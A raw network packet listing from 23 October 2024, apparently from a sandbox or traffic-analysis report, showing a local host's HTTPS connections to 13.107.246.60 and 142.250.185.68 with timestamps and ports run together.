                  Oct 23, 2024 06:48:18.705698967 CEST49796443192.168.2.4142.250.185.68
                  Oct 23, 2024 06:48:18.762085915 CEST4434984413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:18.762129068 CEST4434984413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:18.762247086 CEST49844443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:18.762315989 CEST49844443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:18.762315989 CEST49844443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:18.762329102 CEST4434984413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:18.762341022 CEST4434984413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:18.764199018 CEST49849443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:18.764286041 CEST4434984913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:18.764364004 CEST49849443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:18.764511108 CEST49849443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:18.764544964 CEST4434984913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:18.849204063 CEST4434984513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:18.849507093 CEST49845443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:18.849585056 CEST4434984513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:18.849822998 CEST49845443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:18.849838972 CEST4434984513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:18.976927996 CEST4434984513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:18.976986885 CEST4434984513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:18.977133036 CEST49845443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:18.977195024 CEST49845443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:18.977236032 CEST4434984513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:18.977264881 CEST49845443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:18.977281094 CEST4434984513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:18.979320049 CEST49850443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:18.979355097 CEST4434985013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:18.979412079 CEST49850443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:18.979569912 CEST49850443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:18.979578972 CEST4434985013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.244685888 CEST4434984713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.245307922 CEST49847443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.245345116 CEST4434984713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.245800972 CEST49847443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.245814085 CEST4434984713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.255779028 CEST4434984613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.257462978 CEST49846443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.257488012 CEST4434984613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.258249044 CEST49846443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.258255005 CEST4434984613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.371948957 CEST4434984713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.372107029 CEST4434984713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.372164011 CEST49847443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.372762918 CEST49847443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.372796059 CEST4434984713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.379981041 CEST49851443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.380074024 CEST4434985113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.380150080 CEST49851443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.380198002 CEST4434984813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.380750895 CEST49851443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.380784988 CEST4434985113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.381524086 CEST49848443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.381540060 CEST4434984813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.382827044 CEST49848443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.382833958 CEST4434984813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.387842894 CEST4434984613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.387991905 CEST4434984613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.388047934 CEST49846443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.388154984 CEST49846443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.388166904 CEST4434984613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.388181925 CEST49846443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.388191938 CEST4434984613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.393439054 CEST49852443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.393480062 CEST4434985213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.393547058 CEST49852443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.394088030 CEST49852443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.394100904 CEST4434985213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.491651058 CEST4434984913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.492367983 CEST49849443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.492428064 CEST4434984913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.493211985 CEST49849443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.493227005 CEST4434984913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.514822960 CEST4434984813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.514863014 CEST4434984813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.514970064 CEST4434984813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.514981031 CEST49848443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.515053988 CEST49848443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.515396118 CEST49848443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.515412092 CEST4434984813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.515424013 CEST49848443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.515430927 CEST4434984813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.518589020 CEST49853443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.518680096 CEST4434985313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.518765926 CEST49853443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.519098043 CEST49853443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.519134998 CEST4434985313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.619995117 CEST4434984913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.620145082 CEST4434984913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.620414972 CEST49849443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.635642052 CEST49849443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.635694981 CEST4434984913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.635726929 CEST49849443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.635744095 CEST4434984913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.646859884 CEST49854443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.646895885 CEST4434985413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.646967888 CEST49854443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.647263050 CEST49854443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.647274971 CEST4434985413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.709367990 CEST4434985013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.709963083 CEST49850443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.709973097 CEST4434985013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.710870028 CEST49850443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.710874081 CEST4434985013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.839077950 CEST4434985013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.839102983 CEST4434985013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.839149952 CEST4434985013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.839150906 CEST49850443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.839190006 CEST49850443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.839621067 CEST49850443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.839636087 CEST4434985013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.839672089 CEST49850443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.839678049 CEST4434985013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.843803883 CEST49855443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.843893051 CEST4434985513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.843976974 CEST49855443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.844358921 CEST49855443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:19.844389915 CEST4434985513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:19.895843983 CEST49796443192.168.2.4142.250.185.68
                  Oct 23, 2024 06:48:19.895855904 CEST44349796142.250.185.68192.168.2.4
                  Oct 23, 2024 06:48:20.118938923 CEST4434985113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.119318008 CEST49851443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.119385004 CEST4434985113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.119684935 CEST49851443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.119699955 CEST4434985113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.142489910 CEST4434985213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.143013000 CEST49852443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.143028975 CEST4434985213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.143435955 CEST49852443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.143440008 CEST4434985213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.241467953 CEST4434985313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.241759062 CEST49853443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.241800070 CEST4434985313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.242158890 CEST49853443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.242166996 CEST4434985313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.249492884 CEST4434985113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.249644995 CEST4434985113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.249731064 CEST49851443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.249731064 CEST49851443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.249811888 CEST49851443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.249849081 CEST4434985113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.251745939 CEST49856443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.251802921 CEST4434985613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.251925945 CEST49856443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.252108097 CEST49856443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.252120972 CEST4434985613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.275789022 CEST4434985213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.275949001 CEST4434985213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.276108980 CEST49852443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.276170015 CEST49852443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.276170015 CEST49852443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.276180983 CEST4434985213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.276189089 CEST4434985213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.278012037 CEST49857443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.278029919 CEST4434985713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.278211117 CEST49857443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.278211117 CEST49857443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.278232098 CEST4434985713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.371309996 CEST4434985313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.371479034 CEST4434985313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.371634007 CEST49853443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.371634960 CEST49853443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.371634960 CEST49853443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.373339891 CEST49858443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.373408079 CEST4434985813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.373517036 CEST49858443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.373636961 CEST49858443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.373665094 CEST4434985813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.393011093 CEST4434985413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.393296957 CEST49854443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.393305063 CEST4434985413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.393620014 CEST49854443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.393624067 CEST4434985413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.525369883 CEST4434985413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.525449991 CEST4434985413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.525549889 CEST4434985413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.525576115 CEST49854443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.525651932 CEST49854443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.525882959 CEST49854443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.525892973 CEST4434985413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.525917053 CEST49854443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.525922060 CEST4434985413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.530339956 CEST49859443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.530352116 CEST4434985913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.530540943 CEST49859443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.530885935 CEST49859443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.530898094 CEST4434985913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.575556993 CEST4434985513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.575829029 CEST49855443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.575859070 CEST4434985513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.576668024 CEST49855443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.576682091 CEST4434985513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.674079895 CEST49853443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.674118042 CEST4434985313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.706238031 CEST4434985513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.706295967 CEST4434985513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.706358910 CEST49855443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.706547976 CEST49855443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.706583977 CEST4434985513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.706644058 CEST49855443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.706665993 CEST4434985513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.711405993 CEST49860443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.711500883 CEST4434986013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.711608887 CEST49860443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.711699963 CEST49860443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.711721897 CEST4434986013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.984071970 CEST4434985613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.984596014 CEST49856443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.984627008 CEST4434985613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:20.985064030 CEST49856443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:20.985074043 CEST4434985613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.012188911 CEST4434985713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.012645960 CEST49857443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.012664080 CEST4434985713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.013133049 CEST49857443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.013138056 CEST4434985713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.113466978 CEST4434985613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.113569975 CEST4434985613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.114223003 CEST49856443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.114270926 CEST49856443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.114291906 CEST4434985613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.114336967 CEST49856443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.114346027 CEST4434985613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.117427111 CEST49861443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.117460012 CEST4434986113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.117630005 CEST49861443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.117728949 CEST49861443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.117738008 CEST4434986113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.121172905 CEST4434985813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.121678114 CEST49858443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.121700048 CEST4434985813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.122411966 CEST49858443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.122423887 CEST4434985813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.142642021 CEST4434985713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.142785072 CEST4434985713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.143027067 CEST49857443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.143027067 CEST49857443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.143027067 CEST49857443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.145564079 CEST49862443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.145652056 CEST4434986213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.145720005 CEST49862443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.145869017 CEST49862443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.145900011 CEST4434986213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.253470898 CEST4434985813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.253505945 CEST4434985813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.253551960 CEST4434985813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.253690004 CEST49858443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.253690004 CEST49858443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.253736973 CEST49858443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.253736973 CEST49858443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.253756046 CEST4434985813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.253770113 CEST4434985813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.256958961 CEST49863443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.256982088 CEST4434986313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.257294893 CEST49863443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.257294893 CEST49863443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.257318974 CEST4434986313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.276525974 CEST4434985913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.276921988 CEST49859443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.276937008 CEST4434985913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.277842045 CEST49859443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.277853012 CEST4434985913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.408386946 CEST4434985913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.408570051 CEST4434985913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.408653021 CEST49859443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.408704996 CEST49859443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.408704996 CEST49859443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.408729076 CEST4434985913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.408739090 CEST4434985913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.410615921 CEST49864443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.410680056 CEST4434986413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.410753012 CEST49864443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.410846949 CEST49864443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.410866976 CEST4434986413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.450143099 CEST4434986013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.450434923 CEST49860443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.450495958 CEST4434986013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.450754881 CEST49860443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.450768948 CEST4434986013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.455277920 CEST49857443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.455291033 CEST4434985713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.580864906 CEST4434986013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.580894947 CEST4434986013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.580929041 CEST4434986013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.581005096 CEST49860443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.581006050 CEST49860443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.581116915 CEST49860443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.581116915 CEST49860443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.581160069 CEST4434986013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.581188917 CEST4434986013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.583138943 CEST49865443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.583164930 CEST4434986513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.583319902 CEST49865443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.583528042 CEST49865443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.583539009 CEST4434986513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.969145060 CEST4434986213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.969480991 CEST49862443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.969542027 CEST4434986213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.969841957 CEST49862443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.969856024 CEST4434986213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.970351934 CEST4434986113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.970650911 CEST49861443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.970669031 CEST4434986113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.971128941 CEST49861443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.971138000 CEST4434986113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.991143942 CEST4434986313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.991431952 CEST49863443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.991441011 CEST4434986313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:21.991749048 CEST49863443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:21.991755962 CEST4434986313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.100099087 CEST4434986213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.100245953 CEST4434986213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.100312948 CEST49862443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.100389004 CEST49862443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.100389004 CEST49862443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.100431919 CEST4434986213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.100462914 CEST4434986213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.102284908 CEST4434986113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.102432013 CEST4434986113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.102650881 CEST49861443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.102690935 CEST49861443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.102710009 CEST4434986113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.102721930 CEST49861443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.102730989 CEST4434986113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.103143930 CEST49866443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.103233099 CEST4434986613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.103359938 CEST49866443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.103461027 CEST49866443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.103481054 CEST4434986613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.104496956 CEST49867443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.104537010 CEST4434986713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.104598999 CEST49867443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.104727983 CEST49867443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.104741096 CEST4434986713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.120131969 CEST4434986313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.120279074 CEST4434986313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.120351076 CEST49863443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.120378017 CEST49863443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.120384932 CEST4434986313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.120395899 CEST49863443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.120400906 CEST4434986313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.122119904 CEST49868443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.122174978 CEST4434986813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.122248888 CEST49868443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.122390985 CEST49868443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.122416973 CEST4434986813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.145198107 CEST4434986413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.145586967 CEST49864443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.145646095 CEST4434986413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.145906925 CEST49864443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:22.145921946 CEST4434986413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.275784969 CEST4434986413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:22.275847912 CEST4434986413.107.246.60192.168.2.4
